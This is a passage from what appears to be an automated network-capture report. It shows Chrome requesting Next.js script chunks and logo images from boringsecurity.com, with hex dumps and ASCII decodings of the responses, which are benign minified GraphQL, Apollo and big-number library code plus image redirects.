                                                                          Data Ascii: Y&gV"g1BE;jgJ:;0\1;^"+EEsP/),Bep"z?xuM$xLH=Fu|#c,i[x!4zX[R$5Maf>CyUF%e;LfI%d\WYUBh


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          86192.168.2.54981975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:49 UTC564OUTGET /_next/static/chunks/940-c7b68c0e005aa30a.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:49 UTC423INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 37 32 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 37287Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:49 GMTEtag:
                                                                          2023-12-10 16:44:49 UTC763INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 34 30 5d 2c 7b 36 32 31 32 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 69 2e 64 28 74 2c 7b 50 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 7d 7d 29 3b 76 61 72 20 72 2c 6e 2c 73 2c 61 2c 6f 2c 6c 3d 69 28 34 30 35 31 33 29 3b 6c 65 74 20 68 3d 2f 5c 72 5c 6e 7c 5b 5c 6e 5c 72 5d 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 6c 65 74 20 69 3d 30 2c 72 3d 31 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 65 2e 62 6f 64 79 2e 6d 61 74 63 68 41 6c 6c 28 68 29 29 7b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65
                                                                          Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[940],{62125:function(e,t,i){i.d(t,{Ps:function(){return B}});var r,n,s,a,o,l=i(40513);let h=/\r\n|[\n\r]/g;function c(e,t){let i=0,r=1;for(let n of e.body.matchAll(h)){if("number"==type
                                                                          2023-12-10 16:44:49 UTC2372INData Raw: 7c 60 2c 74 5b 30 5d 5d 2c 2e 2e 2e 74 2e 73 6c 69 63 65 28 31 2c 65 2b 31 29 2e 6d 61 70 28 65 3d 3e 5b 22 7c 22 2c 65 5d 29 2c 5b 22 7c 22 2c 22 5e 22 2e 70 61 64 53 74 61 72 74 28 6c 25 38 30 29 5d 2c 5b 22 7c 22 2c 74 5b 65 2b 31 5d 5d 5d 29 7d 72 65 74 75 72 6e 20 68 2b 70 28 5b 5b 60 24 7b 61 2d 31 7d 20 7c 60 2c 63 5b 6e 2d 31 5d 5d 2c 5b 60 24 7b 61 7d 20 7c 60 2c 75 5d 2c 5b 22 7c 22 2c 22 5e 22 2e 70 61 64 53 74 61 72 74 28 6c 29 5d 2c 5b 60 24 7b 61 2b 31 7d 20 7c 60 2c 63 5b 6e 2b 31 5d 5d 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 6c 65 74 20 74 3d 65 2e 66 69 6c 74 65 72 28 28 5b 65 2c 74 5d 29 3d 3e 76 6f 69 64 20 30 21 3d 3d 74 29 2c 69 3d 4d 61 74 68 2e 6d 61 78 28 2e 2e 2e 74 2e 6d 61 70 28 28 5b 65 5d 29 3d 3e 65 2e 6c 65 6e 67
                                                                          Data Ascii: |`,t[0]],...t.slice(1,e+1).map(e=>["|",e]),["|","^".padStart(l%80)],["|",t[e+1]]])}return h+p([[`${a-1} |`,c[n-1]],[`${a} |`,u],["|","^".padStart(l)],[`${a+1} |`,c[n+1]]])}function p(e){let t=e.filter(([e,t])=>void 0!==t),i=Math.max(...t.map(([e])=>e.leng
                                                                          2023-12-10 16:44:49 UTC538INData Raw: 53 55 42 53 43 52 49 50 54 49 4f 4e 22 2c 72 2e 46 49 45 4c 44 3d 22 46 49 45 4c 44 22 2c 72 2e 46 52 41 47 4d 45 4e 54 5f 44 45 46 49 4e 49 54 49 4f 4e 3d 22 46 52 41 47 4d 45 4e 54 5f 44 45 46 49 4e 49 54 49 4f 4e 22 2c 72 2e 46 52 41 47 4d 45 4e 54 5f 53 50 52 45 41 44 3d 22 46 52 41 47 4d 45 4e 54 5f 53 50 52 45 41 44 22 2c 72 2e 49 4e 4c 49 4e 45 5f 46 52 41 47 4d 45 4e 54 3d 22 49 4e 4c 49 4e 45 5f 46 52 41 47 4d 45 4e 54 22 2c 72 2e 56 41 52 49 41 42 4c 45 5f 44 45 46 49 4e 49 54 49 4f 4e 3d 22 56 41 52 49 41 42 4c 45 5f 44 45 46 49 4e 49 54 49 4f 4e 22 2c 72 2e 53 43 48 45 4d 41 3d 22 53 43 48 45 4d 41 22 2c 72 2e 53 43 41 4c 41 52 3d 22 53 43 41 4c 41 52 22 2c 72 2e 4f 42 4a 45 43 54 3d 22 4f 42 4a 45 43 54 22 2c 72 2e 46 49 45 4c 44 5f 44 45 46
                                                                          Data Ascii: SUBSCRIPTION",r.FIELD="FIELD",r.FRAGMENT_DEFINITION="FRAGMENT_DEFINITION",r.FRAGMENT_SPREAD="FRAGMENT_SPREAD",r.INLINE_FRAGMENT="INLINE_FRAGMENT",r.VARIABLE_DEFINITION="VARIABLE_DEFINITION",r.SCHEMA="SCHEMA",r.SCALAR="SCALAR",r.OBJECT="OBJECT",r.FIELD_DEF
                                                                          2023-12-10 16:44:49 UTC4744INData Raw: 4f 46 3d 22 3c 53 4f 46 3e 22 2c 6e 2e 45 4f 46 3d 22 3c 45 4f 46 3e 22 2c 6e 2e 42 41 4e 47 3d 22 21 22 2c 6e 2e 44 4f 4c 4c 41 52 3d 22 24 22 2c 6e 2e 41 4d 50 3d 22 26 22 2c 6e 2e 50 41 52 45 4e 5f 4c 3d 22 28 22 2c 6e 2e 50 41 52 45 4e 5f 52 3d 22 29 22 2c 6e 2e 53 50 52 45 41 44 3d 22 2e 2e 2e 22 2c 6e 2e 43 4f 4c 4f 4e 3d 22 3a 22 2c 6e 2e 45 51 55 41 4c 53 3d 22 3d 22 2c 6e 2e 41 54 3d 22 40 22 2c 6e 2e 42 52 41 43 4b 45 54 5f 4c 3d 22 5b 22 2c 6e 2e 42 52 41 43 4b 45 54 5f 52 3d 22 5d 22 2c 6e 2e 42 52 41 43 45 5f 4c 3d 22 7b 22 2c 6e 2e 50 49 50 45 3d 22 7c 22 2c 6e 2e 42 52 41 43 45 5f 52 3d 22 7d 22 2c 6e 2e 4e 41 4d 45 3d 22 4e 61 6d 65 22 2c 6e 2e 49 4e 54 3d 22 49 6e 74 22 2c 6e 2e 46 4c 4f 41 54 3d 22 46 6c 6f 61 74 22 2c 6e 2e 53 54 52 49
                                                                          Data Ascii: OF="<SOF>",n.EOF="<EOF>",n.BANG="!",n.DOLLAR="$",n.AMP="&",n.PAREN_L="(",n.PAREN_R=")",n.SPREAD="...",n.COLON=":",n.EQUALS="=",n.AT="@",n.BRACKET_L="[",n.BRACKET_R="]",n.BRACE_L="{",n.PIPE="|",n.BRACE_R="}",n.NAME="Name",n.INT="Int",n.FLOAT="Float",n.STRI
                                                                          2023-12-10 16:44:49 UTC5930INData Raw: 72 3a 20 24 7b 62 28 65 2c 6e 29 7d 2e 60 3a 60 49 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 3a 20 24 7b 62 28 65 2c 6e 29 7d 2e 60 29 7d 72 65 74 75 72 6e 20 78 28 65 2c 6f 2e 45 4f 46 2c 72 2c 72 29 7d 28 74 68 69 73 2c 65 2e 65 6e 64 29 3b 65 2e 6e 65 78 74 3d 74 2c 74 2e 70 72 65 76 3d 65 2c 65 3d 74 7d 77 68 69 6c 65 28 65 2e 6b 69 6e 64 3d 3d 3d 6f 2e 43 4f 4d 4d 45 4e 54 29 3b 72 65 74 75 72 6e 20 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 3d 30 26 26 65 3c 3d 35 35 32 39 35 7c 7c 65 3e 3d 35 37 33 34 34 26 26 65 3c 3d 31 31 31 34 31 31 31 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 29 26 26 67 28 65 2e 63 68 61 72 43 6f 64 65 41
                                                                          Data Ascii: r: ${b(e,n)}.`:`Invalid character: ${b(e,n)}.`)}return x(e,o.EOF,r,r)}(this,e.end);e.next=t,t.prev=e,e=t}while(e.kind===o.COMMENT);return e}}function N(e){return e>=0&&e<=55295||e>=57344&&e<=1114111}function T(e,t){return O(e.charCodeAt(t))&&g(e.charCodeA
                                                                          2023-12-10 16:44:49 UTC7116INData Raw: 72 6e 20 74 68 69 73 2e 70 61 72 73 65 53 74 72 69 6e 67 4c 69 74 65 72 61 6c 28 29 3b 63 61 73 65 20 6f 2e 4e 41 4d 45 3a 73 77 69 74 63 68 28 74 68 69 73 2e 61 64 76 61 6e 63 65 4c 65 78 65 72 28 29 2c 74 2e 76 61 6c 75 65 29 7b 63 61 73 65 22 74 72 75 65 22 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 6f 64 65 28 74 2c 7b 6b 69 6e 64 3a 6b 2e 68 2e 42 4f 4f 4c 45 41 4e 2c 76 61 6c 75 65 3a 21 30 7d 29 3b 63 61 73 65 22 66 61 6c 73 65 22 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 6f 64 65 28 74 2c 7b 6b 69 6e 64 3a 6b 2e 68 2e 42 4f 4f 4c 45 41 4e 2c 76 61 6c 75 65 3a 21 31 7d 29 3b 63 61 73 65 22 6e 75 6c 6c 22 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 6f 64 65 28 74 2c 7b 6b 69 6e 64 3a 6b 2e 68 2e 4e 55 4c 4c 7d 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75
                                                                          Data Ascii: rn this.parseStringLiteral();case o.NAME:switch(this.advanceLexer(),t.value){case"true":return this.node(t,{kind:k.h.BOOLEAN,value:!0});case"false":return this.node(t,{kind:k.h.BOOLEAN,value:!1});case"null":return this.node(t,{kind:k.h.NULL});default:retu
                                                                          2023-12-10 16:44:49 UTC4879INData Raw: 70 65 63 74 4b 65 79 77 6f 72 64 28 22 65 78 74 65 6e 64 22 29 2c 74 68 69 73 2e 65 78 70 65 63 74 4b 65 79 77 6f 72 64 28 22 73 63 61 6c 61 72 22 29 3b 6c 65 74 20 74 3d 74 68 69 73 2e 70 61 72 73 65 4e 61 6d 65 28 29 2c 69 3d 74 68 69 73 2e 70 61 72 73 65 43 6f 6e 73 74 44 69 72 65 63 74 69 76 65 73 28 29 3b 69 66 28 30 3d 3d 3d 69 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 74 68 69 73 2e 75 6e 65 78 70 65 63 74 65 64 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 6f 64 65 28 65 2c 7b 6b 69 6e 64 3a 6b 2e 68 2e 53 43 41 4c 41 52 5f 54 59 50 45 5f 45 58 54 45 4e 53 49 4f 4e 2c 6e 61 6d 65 3a 74 2c 64 69 72 65 63 74 69 76 65 73 3a 69 7d 29 7d 70 61 72 73 65 4f 62 6a 65 63 74 54 79 70 65 45 78 74 65 6e 73 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 74 68 69 73 2e
                                                                          Data Ascii: pectKeyword("extend"),this.expectKeyword("scalar");let t=this.parseName(),i=this.parseConstDirectives();if(0===i.length)throw this.unexpected();return this.node(e,{kind:k.h.SCALAR_TYPE_EXTENSION,name:t,directives:i})}parseObjectTypeExtension(){let e=this.
                                                                          2023-12-10 16:44:49 UTC9488INData Raw: 67 61 63 79 46 72 61 67 6d 65 6e 74 56 61 72 69 61 62 6c 65 73 3a 4d 7d 29 3b 69 66 28 21 6f 7c 7c 22 44 6f 63 75 6d 65 6e 74 22 21 3d 3d 6f 2e 6b 69 6e 64 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4e 6f 74 20 61 20 76 61 6c 69 64 20 47 72 61 70 68 51 4c 20 64 6f 63 75 6d 65 6e 74 2e 22 29 3b 4c 2e 73 65 74 28 74 2c 28 69 3d 6e 65 77 20 53 65 74 2c 72 3d 5b 5d 2c 6f 2e 64 65 66 69 6e 69 74 69 6f 6e 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 46 72 61 67 6d 65 6e 74 44 65 66 69 6e 69 74 69 6f 6e 22 3d 3d 3d 65 2e 6b 69 6e 64 29 7b 76 61 72 20 74 2c 6e 3d 65 2e 6e 61 6d 65 2e 76 61 6c 75 65 2c 73 3d 55 28 28 74 3d 65 2e 6c 6f 63 29 2e 73 6f 75 72 63 65 2e 62 6f 64 79 2e 73 75 62 73 74 72 69 6e 67 28 74 2e 73 74 61 72 74 2c
                                                                          Data Ascii: gacyFragmentVariables:M});if(!o||"Document"!==o.kind)throw Error("Not a valid GraphQL document.");L.set(t,(i=new Set,r=[],o.definitions.forEach(function(e){if("FragmentDefinition"===e.kind){var t,n=e.name.value,s=U((t=e.loc).source.body.substring(t.start,
                                                                          2023-12-10 16:44:49 UTC1457INData Raw: 6f 61 64 69 6e 67 26 26 74 68 69 73 2e 72 65 6e 64 65 72 50 72 6f 6d 69 73 65 73 2e 61 64 64 4f 62 73 65 72 76 61 62 6c 65 51 75 65 72 79 50 72 6f 6d 69 73 65 28 65 29 29 2c 65 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 52 65 73 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 72 65 73 75 6c 74 3b 74 26 26 74 2e 64 61 74 61 26 26 28 74 68 69 73 2e 70 72 65 76 69 6f 75 73 44 61 74 61 3d 74 2e 64 61 74 61 29 2c 74 68 69 73 2e 72 65 73 75 6c 74 3d 65 2c 74 68 69 73 2e 66 6f 72 63 65 55 70 64 61 74 65 28 29 2c 74 68 69 73 2e 68 61 6e 64 6c 65 45 72 72 6f 72 4f 72 43 6f 6d 70 6c 65 74 65 64 28 65 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 6e 64 6c 65 45 72 72 6f 72 4f 72 43 6f 6d 70 6c 65 74 65 64 3d 66 75 6e 63
                                                                          Data Ascii: oading&&this.renderPromises.addObservableQueryPromise(e)),e},e.prototype.setResult=function(e){var t=this.result;t&&t.data&&(this.previousData=t.data),this.result=e,this.forceUpdate(),this.handleErrorOrCompleted(e)},e.prototype.handleErrorOrCompleted=func


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          87192.168.2.54982075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:49 UTC627OUTGET /_next/image?url=%2Fimages%2Flogo.png&w=64&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:49 UTC382INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 39 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 36 34 2c 71 5f 37 35 2f 25 32 46 69 6d 61 67 65 73 25 32 46 6c 6f 67 6f 2e 70 6e 67 3f 75 72 6c 3d 25 32 46 69 6d 61 67 65 73 25 32 46 6c 6f 67 6f 2e 70 6e 67 26 77 3d 36 34 26 71 3d 37 35 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:44:49 GMTLocation: /_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=75Server: NetlifyStrict-Trans
                                                                          2023-12-10 16:44:49 UTC93INData Raw: 35 37 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 36 34 2c 71 5f 37 35 2f 25 32 46 69 6d 61 67 65 73 25 32 46 6c 6f 67 6f 2e 70 6e 67 3f 75 72 6c 3d 25 32 46 69 6d 61 67 65 73 25 32 46 6c 6f 67 6f 2e 70 6e 67 26 77 3d 36 34 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: 57Redirecting to /_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=75
                                                                          2023-12-10 16:44:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          88192.168.2.54982175.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:49 UTC628OUTGET /_next/image?url=%2Fimages%2Flogo.png&w=256&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:49 UTC385INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 73 74 61 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 39 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 32 35 36 2c 71 5f 37 35 2f 25 32 46 69 6d 61 67 65 73 25 32 46 6c 6f 67 6f 2e 70 6e 67 3f 75 72 6c 3d 25 32 46 69 6d 61 67 65 73 25 32 46 6c 6f 67 6f 2e 70 6e 67 26 77 3d 32 35 36 26 71 3d 37 35 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=staleContent-Type: text/plainDate: Sun, 10 Dec 2023 16:44:49 GMTLocation: /_ipx/w_256,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=256&q=75Server: NetlifyStrict-Tr
                                                                          2023-12-10 16:44:49 UTC95INData Raw: 35 39 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 32 35 36 2c 71 5f 37 35 2f 25 32 46 69 6d 61 67 65 73 25 32 46 6c 6f 67 6f 2e 70 6e 67 3f 75 72 6c 3d 25 32 46 69 6d 61 67 65 73 25 32 46 6c 6f 67 6f 2e 70 6e 67 26 77 3d 32 35 36 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: 59Redirecting to /_ipx/w_256,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=256&q=75
                                                                          2023-12-10 16:44:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          89192.168.2.54982275.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:49 UTC563OUTGET /_next/static/chunks/98-5331d5e48bc919a7.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:49 UTC423INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 34 30 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 44054Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:49 GMTEtag:
                                                                          2023-12-10 16:44:49 UTC763INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 38 5d 2c 7b 33 39 30 39 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 72 29 7b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 69 29 7b 69 66 28 21 74 29 74 68 72 6f 77 20 45 72 72 6f 72 28 69 7c 7c 22 41 73 73 65 72 74 69 6f 6e 20 66 61 69 6c 65 64 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 2c 69 29 7b 74 2e 73 75 70 65 72 5f 3d 69 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 2e 70 72 6f 74 6f 74 79 70 65 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2c 74 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 65 77 20
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[98],{39098:function(t,i,r){!function(t,i){"use strict";function h(t,i){if(!t)throw Error(i||"Assertion failed")}function n(t,i){t.super_=i;var r=function(){};r.prototype=i.prototype,t.prototype=new
                                                                          2023-12-10 16:44:49 UTC2372INData Raw: 74 2c 69 2c 72 29 7b 76 61 72 20 68 3d 6f 28 74 2c 72 29 3b 72 65 74 75 72 6e 20 72 2d 31 3e 3d 69 26 26 28 68 7c 3d 6f 28 74 2c 72 2d 31 29 3c 3c 34 29 2c 68 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 69 2c 72 2c 6e 29 7b 66 6f 72 28 76 61 72 20 65 3d 30 2c 6f 3d 30 2c 73 3d 4d 61 74 68 2e 6d 69 6e 28 74 2e 6c 65 6e 67 74 68 2c 72 29 2c 75 3d 69 3b 75 3c 73 3b 75 2b 2b 29 7b 76 61 72 20 61 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 34 38 3b 65 2a 3d 6e 2c 6f 3d 61 3e 3d 34 39 3f 61 2d 34 39 2b 31 30 3a 61 3e 3d 31 37 3f 61 2d 31 37 2b 31 30 3a 61 2c 68 28 61 3e 3d 30 26 26 6f 3c 6e 2c 22 49 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 22 29 2c 65 2b 3d 6f 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 69 29 7b 74 2e 77 6f
                                                                          Data Ascii: t,i,r){var h=o(t,r);return r-1>=i&&(h|=o(t,r-1)<<4),h}function u(t,i,r,n){for(var e=0,o=0,s=Math.min(t.length,r),u=i;u<s;u++){var a=t.charCodeAt(u)-48;e*=n,o=a>=49?a-49+10:a>=17?a-17+10:a,h(a>=0&&o<n,"Invalid character"),e+=o}return e}function a(t,i){t.wo
